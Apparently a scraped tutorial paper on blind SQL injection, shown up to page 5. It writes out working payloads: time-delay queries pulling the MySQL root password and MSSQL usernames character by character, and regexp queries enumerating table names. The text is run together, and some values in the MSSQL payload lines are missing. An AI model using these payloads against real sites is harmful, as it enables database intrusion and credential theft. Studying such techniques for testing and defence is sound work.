[ Pobierz całość w formacie PDF ]
//-->Blind Sql Injection – Regular Expressions AttackBlind Sql Injection with RegularExpressions AttackPowered by IHTeamSite:www.ihteam.netPHP example codeThis paperAuthors:Simone 'R00T_ATI' QuatriniMarco 'white_sheep' Rondini1/9Blind Sql Injection – Regular Expressions AttackIndexWhy blind sql injection?.......................................................................................................................3How blind sql injection can be used?...................................................................................................3Testing vulnerability (MySQL - MSSQL):........................................................................................3Time attack (MySQL)............................................................................................................................3Time attack (MSSQL)...........................................................................................................................4Regexp attack's methodology................................................................................................................5Finding table name with Regexp attack (MySQL)...........................................................................5Finding table name with Regexp attack (MSSQL)...........................................................................6Exporting a value with Regexp attack (MySQL).............................................................................7Exporting a value with Regexp attack (MSSQL).............................................................................7Time considerations..............................................................................................................................8Bypassing filters...................................................................................................................................9Real life example..................................................................................................................................9Conclusions..........................................................................................................................................92/9Blind Sql Injection – Regular Expressions AttackWhy blind sql injection?Blind SQL Injection is used when a web application is vulnerable to an SQL injection, but theresults of the injection are not visible to the attacker.The page with the vulnerability may not be one that displays data but will display differentlydepending on the results of a logical statement injected into the legitimate SQL statementcalled for that page.This type of attack can become time-intensive because a new statement must be crafted foreach bit recovered. [Wikipedia]How blind sql injection can be used?There are several uses for the Blind Sql Injection:•••Testing the vulnerability;Finding the table name;Exporting a value;Every techniques are based on the 'guess attack', because we only have two different input:TRUE or FALSE. Let me explain better...Testing vulnerability (MySQL - MSSQL):Let's star with an easy example. We have this type of URL:site.com/news.php?id=2it will result in this type of query on the database:SELECT * FROM news WHERE ID = 2Now, we can try some sql injection techniques, for example the blind sql injection!site.com/news.php?id=2 and 1=0SQL query is now:SELECT * FROM news WHERE ID = 2 and 1=0In this case the query will not return anything (FALSE) because 1 is different from 0; Let's dothe litmus test: try to get the TRUE statement forcing the AND to be TRUE;site.com/news.php?id=2 and 0=0In this case 0 is equal to 0... Got it! We should now see the original news page. We now knowthat is vulnerable to Blind Sql Injection.Time attack (MySQL)When you can't see any kind of results, you must use the time attack.In this example we will try to obtain the password of root user in mysql (if your have rootpriviledges on mysql).BENCHMARK function is used to sleep for some seconds.3/9Blind Sql Injection – Regular Expressions AttackSyntax: BENCHMARK(how many times,thing to do).When you use it in IF statement, you will be able to make time attack in MySQL;SELECT 1,1 UNION SELECTIF(SUBSTRING(Password,1,1)='a',BENCHMARK(100000,SHA1(1)),0) User,PasswordFROM mysql.user WHERE User = ‘root’;SELECT 1,1 UNION SELECTIF(SUBSTRING(Password,1,1)='b',BENCHMARK(100000,SHA1(1)),0) User,PasswordFROM mysql.user WHERE User = ‘root’;SELECT 1,1 UNION SELECTIF(SUBSTRING(Password,1,1)='c',BENCHMARK(100000,SHA1(1)),0) User,PasswordFROM mysql.user WHERE User = ‘root’;SELECT 1,1 UNION SELECTIF(SUBSTRING(Password,1,1)='d',BENCHMARK(100000,SHA1(1)),0) User,PasswordFROM mysql.user WHERE User = ‘root’;And so on until you will see the BENCHMARK running (few more seconds delay). Now proceedwith the 2ndword of the password...Time attack (MSSQL)In this example we will try to obtain the username of the sysusers table.A simple way to generate time delays is to take advantage of one of the biggest databaseproblems, that have made necessary the development of performance-tuning techniques;heavy queries. All you need to generate a time delay is to access a table that has someregisters and to build a good query to force the engine to work. In other words, we need tobuild a query ignoring what the performance best practices recommend. (This technique wasmade by Chema Alonso, Microsoft Security MVP)site.com/news.aspx?id=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers assys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6,sysusers AS sys7, sysusers AS sys8)>1 and300>(selecttop 1ascii(substring(name,1,1)) from sysusers)Positive result. The condition is true, and the response has a delay of 14 seconds. We actuallyknow that the ASCII value of the first username’s letter in the sysusers table is lower than300.site.com/news.aspx?id=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers assys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6,sysusers AS sys7, sysusers AS sys8)>1 and>(select top 1 ascii(substring(name,1,1))from sysusers)Negative Result. One-second response delay. We actually know than the ASCII value of thefirst username’s letter in the sysusers table is higher than0.And so on for all the possibilities:[...] >1 and300>(select top 1 ascii(substring(name,1,1)) from sysusers)→14seconds→TRUE[...] >1 and>(select top 1 ascii(substring(name,1,1)) from sysusers)→1 second→FALSE[...] >1 and150>(select top 1 ascii(substring(name,1,1)) from sysusers)→14seconds→TRUE[...] >1 and75>(select top 1 ascii(substring(name,1,1)) from sysusers)→1 second→4/9Blind Sql Injection – Regular Expressions AttackFALSE[...] >1 and100>(select top 1 ascii(substring(name,1,1)) from sysusers)→1 second→FALSE[...] >1 and110>(select top 1 ascii(substring(name,1,1)) from sysusers)→1 second→FALSE[...] >1 and120>(select top 1 ascii(substring(name,1,1)) from sysusers)→14seconds→TRUE[...] >1 and115>(select top 1 ascii(substring(name,1,1)) from sysusers)→1 second→FALSE[...] >1 and118>(select top 1 ascii(substring(name,1,1)) from sysusers)→1 second→FALSE[...] >1 and119>(select top 1 ascii(substring(name,1,1)) from sysusers)→1 second→FALSEThen the result is ASCII(119)='w'.Start with the second letter... and so on!Regexp attack's methodologyThis is our own creation and it is the faster to extract information from a database. With thisyou can save a lot of time and bandwidth!The methodology is pretty simple: we define a range of numbers/chars/spacial chars that willbe matched with REGEXP (MySQL) or LIKE (MSSQL) functions.Let's start with an example because is more simple to understand.Finding table name with Regexp attack (MySQL)In this example we will extract the first matched record of information_schema.tables, youmust know the name of database!index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables LIMIT 0,1)We tested the blind sql injection attack, and if we see the correct page, everything is ok.index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERETABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-z]' LIMIT 0,1)In this case we know that the first matched record start with a char between [a -> z]That example will show you how to extract the complete name of the record:index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERETABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-n]' LIMIT 0,1)Trueindex.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERETABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-g]' LIMIT 0,1)Falseindex.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERETABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[h-n]' LIMIT 0,1)Trueindex.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERETABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[h-l]' LIMIT 0,1)False5/9 [ Pobierz całość w formacie PDF ]